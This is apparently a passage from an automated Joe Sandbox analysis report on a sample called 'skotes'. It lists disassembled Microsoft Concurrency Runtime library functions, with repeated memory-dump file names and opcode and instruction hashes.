                                                                                                                                              • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00432846
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2530155754-0
                                                                                                                                              • Opcode ID: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
                                                                                                                                              • Instruction ID: fb03d83531a47042b93fe6564ff1c061b34d3f88821af197b1cf19dfef14ec32
                                                                                                                                              • Opcode Fuzzy Hash: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
                                                                                                                                              • Instruction Fuzzy Hash: 6B81C270900249ABDF169F54CA41BBF7BB1AF0D308F04509AEC4127352C7BA8D16DB65
                                                                                                                                              Function 00432970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432982
                                                                                                                                                • Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504
                                                                                                                                              • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004329A3
                                                                                                                                              • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004329B0
                                                                                                                                              • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004329FE
                                                                                                                                              • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432AA6
                                                                                                                                              • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432AD8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1256429809-0
                                                                                                                                              • Opcode ID: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
                                                                                                                                              • Instruction ID: 2c3f4ac1ddb9b2e884700b4006eb7aadb935b7841f65a9e333380771e6a1d96e
                                                                                                                                              • Opcode Fuzzy Hash: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
                                                                                                                                              • Instruction Fuzzy Hash: 8271BC70A00249AFDF15DF54CA80BBFBBB1AF49308F04509AEC416B352C7B9AD16DB65
                                                                                                                                              Function 00422832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422876
                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004228DF
                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00422913
                                                                                                                                                • Part of subcall function 004207ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0042080D
                                                                                                                                              • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422993
                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229DB
                                                                                                                                                • Part of subcall function 004207C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004207DE
                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229EF
                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422A00
                                                                                                                                              • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00422A4D
                                                                                                                                              • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422A7E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1321587334-0
                                                                                                                                              • Opcode ID: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
                                                                                                                                              • Instruction ID: e80cf76bb90d4b83ff5cf9a0939ff877604985d568bc9a9fcea241cccaa3ebda
                                                                                                                                              • Opcode Fuzzy Hash: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
                                                                                                                                              • Instruction Fuzzy Hash: 0481BF71B00526ABCB18DF69FA9057EB7F1BB48704B94403ED441A3741EBB8A981CB9D
                                                                                                                                              Function 004269DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00426A1F
                                                                                                                                              • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426A51
                                                                                                                                              • List.LIBCONCRT ref: 00426A8C
                                                                                                                                              • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426A9D
                                                                                                                                              • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426AB9
                                                                                                                                              • List.LIBCONCRT ref: 00426AF4
                                                                                                                                              • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426B05
                                                                                                                                              • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426B20
                                                                                                                                              • List.LIBCONCRT ref: 00426B5B
                                                                                                                                              • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426B68
                                                                                                                                                • Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425EF7
                                                                                                                                                • Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425F09
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
